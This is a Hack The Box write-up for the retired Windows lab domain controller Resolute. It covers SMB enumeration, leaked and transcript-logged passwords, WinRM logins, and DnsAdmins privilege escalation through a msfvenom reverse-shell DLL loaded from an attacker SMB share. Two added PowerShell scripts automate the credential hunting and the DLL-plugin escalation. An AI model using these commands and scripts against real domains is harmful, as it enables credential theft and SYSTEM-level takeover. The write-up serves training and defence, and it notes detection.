Hackthebox Resolute writeup
Introduction@Resolute:~$
| Column | Details |
|---|---|
| Name | Resolute |
| IP | 10.10.10.169 |
| Points | 30 |
| OS | Windows |
| Difficulty | Medium |
| Creator | egre55 |
| Out On | 7 Dec 2019 |
| Retired On | 30 May 2020 |
Brief@Resolute:~$
Running enum4linux against the box gives a list of domain users and, in one account description, a password for the user marko. That password does not work for marko, but trying it against the other users gets a WinRM login as melanie with evil-winrm. Manual enumeration turns up a hidden directory holding a PowerShell transcript that contains the password of the user ryan. After switching to ryan we see that ryan is a member of the DnsAdmins group. Pointing the DNS server's ServerLevelPluginDll setting at a malicious DLL on our SMB share and restarting the DNS service makes the service load our DLL as SYSTEM.
Summary@Resolute:~$
- Running enum4linux gives some usernames.
- Got a password for the user marko, but it turned out to be melanie's.
- Logged in as melanie using evil-winrm.
- Got user.txt.
- Manual enumeration found some hidden files.
- Got the password for user ryan from a PowerShell transcript file.
- Switched to ryan.
- ryan is in the DnsAdmins group.
- Crafted a malicious DLL for the DNS service to load as its server-level plugin.
- Started an SMB server using impacket's smbserver.py.
- Set ServerLevelPluginDll to the UNC path of my DLL.
- Stopped and started the dns service.
- Got root.txt.
Pwned
Recon
Nmap
```
➜ resolute nmap -sC -sV -p- -v -oA scans/nmap-full -T4 resolute.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 09:31 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Initiating NSE at 09:31
Completed NSE at 09:31, 0.00s elapsed
Initiating Ping Scan at 09:31
Scanning resolute.htb (10.10.10.169) [4 ports]
Completed Ping Scan at 09:31, 0.59s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:31
Scanning resolute.htb (10.10.10.169) [65535 ports]
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 49677/tcp on 10.10.10.169
NSE: Script scanning 10.10.10.169.
Initiating NSE at 09:52
Completed NSE at 09:54, 121.80s elapsed
Initiating NSE at 09:54
Completed NSE at 09:54, 1.93s elapsed
Nmap scan report for resolute.htb (10.10.10.169)
Host is up (0.36s latency).
Not shown: 65510 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-29 04:29:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
64798/tcp open tcpwrapped
64974/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=5/29%Time=5ED11327%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -7h00m31s, deviation: 4h02m32s, median: -9h20m33s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-05-28T21:32:12-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-05-29 00:32:10
|_ start_date: 2020-05-28 18:33:16
NSE: Script Post-scanning.
Initiating NSE at 09:54
Completed NSE at 09:54, 0.00s elapsed
Initiating NSE at 09:54
Completed NSE at 09:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1372.93 seconds
Raw packets sent: 72795 (3.203MB) | Rcvd: 69585 (2.784MB)
```
Woo, so many ports and services are open. Taken together, DNS (53), Kerberos (88), LDAP (389/636/3268/3269), SMB (445) and WinRM (5985) with the domain megabank.local say this is a domain controller, so any foothold on this host is a foothold on the domain itself.
Enum4linux
Since SMB is open, enum4linux is the natural next step for some juicy information, so let's run it.
```
➜ prashant enum4linux resolute.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat May 30 07:44:42 2020
==========================
| Target Information |
==========================
Target ........... resolute.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on resolute.htb |
====================================================
[E] Cant find workgroup/domain
============================================
| Nbtstat Information for resolute.htb |
============================================
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Looking up status of 10.10.10.169
No reply from 10.10.10.169
```
As I expected, I got everything needed for the next steps.
Users list
The null session enumerated the domain users (interesting):
```
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
```
And one more very interesting thing: the account description of the user marko, readable without any credentials, contains a password:
```
=============================
| Users on resolute.htb |
=============================
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
```
So I tried evil-winrm with user marko and password Welcome123!
```
➜ prashant evil-winrm -u marko -p Welcome123! -i 10.10.10.169
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
```
That just turned out to be the wrong password for marko.
Login as melanie
I could also have used the Metasploit module winrm_login, which sprays the password we have across the list of usernames, but to be honest I guessed the username. See the module page for details:
https://www.rapid7.com/db/modules/auxiliary/scanner/winrm/winrm_login
The authorization error above means the credentials are wrong for marko, so I tried the other enumerated users with the same password and got in as melanie. The description field calls it the password set at account creation, and that onboarding password still works for melanie.
```
➜ prashant evil-winrm -u melanie -p Welcome123! -i 10.10.10.169
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents>
```
Without wasting any time I grabbed the user flag.
Got user.txt
```
*Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
0c3be45f--------------------8540
*Evil-WinRM* PS C:\Users\melanie\Desktop>
```
Now it's time for root.
Enumeration
After some manual enumeration I found a hidden directory called PSTranscripts. A plain dir does not show hidden entries, so I moved to C:\ and listed the hidden ones too with dir -Force:
```
*Evil-WinRM* PS C:\> dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 2/8/2020 8:22 PM 402653184 pagefile.sys
*Evil-WinRM* PS C:\>
```
PSTranscripts is the only hidden directory here that Windows did not create itself. Inside it is a dated subdirectory, again with a hidden file:
```
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
```
So we have a PowerShell transcript file, PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt, which records every command a user typed in a remoting session:
```
*Evil-WinRM* PS C:\PSTranscripts\20191203> cat PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
```
And the most interesting thing: the transcript recorded a password for user ryan. The logged command was
- cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
The command itself failed (net use expects the password right after the share and the account as /user:ryan, hence "The syntax of this command is:"), but transcription logs the command line exactly as typed, so the cleartext password survived in a file that melanie can read. The password is Serv3r4Admin4cc123!
Yay!
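Here is an added PowerShell example of my own (not code from the original writeup) that turns the two manual steps above, dir -Force for hidden directories and reading the transcript by hand, into one sweep you can paste into the melanie session. It reads the transcription policy key to learn where transcripts are written, lists hidden directories under C:\ that Windows did not create itself, and greps transcript files for commands that carry credentials. The path C:\PSTranscripts comes from this box; the policy key and the default Start-Transcript location under the user's Documents folder are standard Windows behaviour; the regex is my own choice and is deliberately broad.

```powershell
# Added example (not from the original writeup): transcript and credential
# hunting from an unprivileged WinRM session. Run inside evil-winrm as melanie.

function Get-TranscriptPolicy {
    # When transcription is switched on by GPO, this key names the directory
    # every user's transcripts are written to. C:\PSTranscripts on this box is
    # exactly such a central directory.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'
    if (Test-Path $key) {
        Get-ItemProperty -Path $key |
            Select-Object EnableTranscripting, EnableInvocationHeader, OutputDirectory
    } else {
        Write-Output 'No transcription policy key; check per-user Documents folders (Start-Transcript default).'
    }
}

function Find-HiddenDirectories {
    param([string]$Root = 'C:\')
    # Same idea as dir -Force, but keep only hidden directories that the OS
    # did not put there, so the odd one out stands out immediately.
    $builtin = '$RECYCLE.BIN', 'Documents and Settings', 'ProgramData',
               'Recovery', 'System Volume Information', 'Config.Msi'
    Get-ChildItem -Path $Root -Force -Directory -ErrorAction SilentlyContinue |
        Where-Object {
            $_.Attributes.HasFlag([IO.FileAttributes]::Hidden) -and
            $builtin -notcontains $_.Name
        }
}

function Find-CredentialLines {
    param(
        [string[]]$Path = @('C:\PSTranscripts', "$env:USERPROFILE\Documents"),
        # Commands that take a password on the command line, plus PowerShell
        # credential construction. Broad on purpose; review the hits by hand.
        [string]$Pattern = 'net use|runas|/user:|passw|ConvertTo-SecureString|PSCredential|-p '
    )
    Get-ChildItem -Path $Path -Recurse -Force -File -Include '*.txt' -ErrorAction SilentlyContinue |
        Select-String -Pattern $Pattern |
        Select-Object Path, LineNumber, Line
}

Get-TranscriptPolicy
Find-HiddenDirectories
Find-CredentialLines
```

On this box Find-CredentialLines returns the net use line with ryan's password. The same three checks are worth running from the defensive side: a central transcript directory readable by every user defeats the point of transcription, and an ACL that restricts it to administrators (plus forwarding the files off the host) is the fix.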
Using evil-winrm I logged in as ryan:
```
➜ prashant evil-winrm -i resolute.htb -u ryan -p Serv3r4Admin4cc123!
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents>
```
Privilege Escalation
To check what groups and privileges I have, I ran whoami /all:
```
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
```
From this line we can see that ryan is in the DnsAdmins group:
```
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
```
Now I have something to focus on. After some research I found an article on abusing DnsAdmins: the DNS Server service (dns.exe) on a domain controller runs as SYSTEM and, whenever it starts, loads the DLL named by its ServerLevelPluginDll setting, and members of DnsAdmins are allowed to set that value through dnscmd. So I created a malicious DLL with msfvenom that gives me a meterpreter shell (x64, to match the 64-bit dns.exe):
```
➜ prashant msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=5678 -f dll > saini.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes
```
Then I pulled saini.dll onto the machine with iwr (Invoke-WebRequest) from a web server on my box:
```
*Evil-WinRM* PS C:\tmp> iwr -uri http://10.10.14.4/saini.dll -o saini.dll
```
And it has been downloaded:
```
*Evil-WinRM* PS C:\tmp> ls
Directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/29/2020 10:48 PM 5120 saini.dll
```
But running ls a moment later, the DLL is gone, which confirms that antivirus with real-time protection is running and quarantines the unencoded msfvenom payload as soon as it lands on disk:
```
*Evil-WinRM* PS C:\tmp> ls
*Evil-WinRM* PS C:\tmp>
```
I will host the DLL on an SMB share instead, as the article also suggests: the DNS service loads its plugin straight from the UNC path when it starts, so the file never has to sit on the target's disk where the antivirus deletes it. impacket's smbserver.py gives a quick anonymous share (the -smb2support flag lets the Windows client connect over SMB2):
```
➜ prashant python /usr/share/doc/python-impacket/examples/smbserver.py -smb2support public .
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```
Hack - Steps
What I am going to do is set ServerLevelPluginDll to the UNC path of my malicious DLL:
```
dnscmd /config /serverlevelplugindll \\10.10.14.4\public\saini.dll
```
Then I need to stop the dns service and start it again. When the service starts, it looks up the configured plugin DLL, and since that now points at my DLL on the SMB share, dns.exe (running as SYSTEM) fetches and loads it, and we get a shell. One caveat: DnsAdmins membership by itself does not include the right to stop and start the DNS service; on this box ryan has that right, but elsewhere you may have to wait for the service to be restarted.
Setting the serverlevelplugindll to my file
```
*Evil-WinRM* PS C:\tmp> dnscmd /config /serverlevelplugindll \\10.10.14.4\public\saini.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\tmp>
```
Stopping the service
```
*Evil-WinRM* PS C:\tmp> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\tmp>
```
Starting the service
```
*Evil-WinRM* PS C:\tmp> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3948
FLAGS :
*Evil-WinRM* PS C:\tmp>
```
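Here is an added PowerShell example of my own (not the author's code, and not from the article they mention) that packages the DnsAdmins steps above, from the group check through the service restart and the cleanup the writeup never does, into one checked procedure to run from the evil-winrm session as ryan. It assumes the DLL is served from the writeup's share \\10.10.14.4\public\saini.dll, and it assumes that dnscmd /config /serverlevelplugindll with no value clears the setting, which is the cleanup form I use; if a host refuses that, the value lives under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters and removing it there needs an account with write access to that key.

```powershell
# Added example (not from the original writeup): DnsAdmins -> SYSTEM via
# ServerLevelPluginDll, with the checks and cleanup a careful operator wants.
# Assumes: evil-winrm session as a DnsAdmins member on the DC; attacker share
# \\10.10.14.4\public\saini.dll; 'dnscmd /config /serverlevelplugindll' with no
# value clears the setting (my assumption, see lead-in).

$DnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Test-DnsAdmins {
    # True when the current token carries the DnsAdmins group (what whoami /all showed).
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $names = $id.Groups | ForEach-Object {
        try { $_.Translate([Security.Principal.NTAccount]).Value } catch { $null }
    }
    [bool]($names -match '\\DnsAdmins$')
}

function Get-DnsPluginDll {
    # What dns.exe will load on its next start; empty when nothing is configured.
    (Get-ItemProperty -Path $DnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
}

function Restart-DnsService {
    param([int]$TimeoutSec = 30)
    # sc.exe returns as soon as the request is queued (STOP_PENDING / START_PENDING
    # in the writeup), so poll the real state instead of assuming it completed.
    sc.exe stop dns | Out-Null
    $deadline = (Get-Date).AddSeconds($TimeoutSec)
    while ((Get-Service dns).Status -ne 'Stopped' -and (Get-Date) -lt $deadline) { Start-Sleep -Seconds 1 }
    sc.exe start dns | Out-Null
    $deadline = (Get-Date).AddSeconds($TimeoutSec)
    while ((Get-Service dns).Status -notin @('Running', 'Stopped') -and (Get-Date) -lt $deadline) { Start-Sleep -Seconds 1 }
    # A payload DLL without the DnsPlugin* exports still runs its DllMain (so the
    # shell fires) but can leave the service stopped; report what actually happened.
    (Get-Service dns).Status
}

function Invoke-DnsPluginLoad {
    param([Parameter(Mandatory)][string]$UncPath)
    if (-not (Test-DnsAdmins)) { throw 'Current user is not in DnsAdmins; dnscmd /config will be denied.' }
    "Before: ServerLevelPluginDll = '$(Get-DnsPluginDll)'"
    # dnscmd talks to the DNS service over RPC, which is why DnsAdmins membership
    # (not registry ACLs) is what matters here. A UNC path makes dns.exe fetch the
    # DLL over SMB as the DC's machine account, so nothing touches the local disk.
    dnscmd /config /serverlevelplugindll $UncPath
    "After:  ServerLevelPluginDll = '$(Get-DnsPluginDll)'"
    Restart-DnsService
}

function Clear-DnsPluginDll {
    # Always clean up: the value persists across reboots and is a SYSTEM backdoor
    # for anyone who controls the share, and DNS for the domain stays broken
    # while a non-plugin DLL is configured.
    dnscmd /config /serverlevelplugindll   # assumption: empty value clears the setting
    Restart-DnsService
    "Cleared: ServerLevelPluginDll = '$(Get-DnsPluginDll)'"
}

Invoke-DnsPluginLoad -UncPath '\\10.10.14.4\public\saini.dll'
# ...catch the session on the handler, then:
# Clear-DnsPluginDll
```

Run Invoke-DnsPluginLoad with the Metasploit handler already listening and look at the status it returns: if it is not Running, name resolution for megabank.local is down until Clear-DnsPluginDll has run. Get-DnsPluginDll is also the cheapest detection for this technique from the defender's side: on every DNS server the value should be empty unless a plugin was deliberately deployed, and membership of DnsAdmins should be treated as equivalent to Domain Admins when reviewing group changes.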
Got a meterpreter shell:
```
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.4:5678
[*] Sending stage (206403 bytes) to 10.10.10.169
[*] Meterpreter session 3 opened (10.10.14.4:5678 -> 10.10.10.169:60148) at 2020-05-30 11:20:31 -0400
meterpreter >
```
The session runs as SYSTEM (the account the DNS service runs under), which is above Administrator. Better if we just spawn a shell to confirm:
```
meterpreter > shell
Process 1908 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
```
Got root.txt
```
C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d---------------------------19c
```
And we pwned it.
If you liked the writeup, support a poor student in getting the OSCP cert:
Donation for OSCP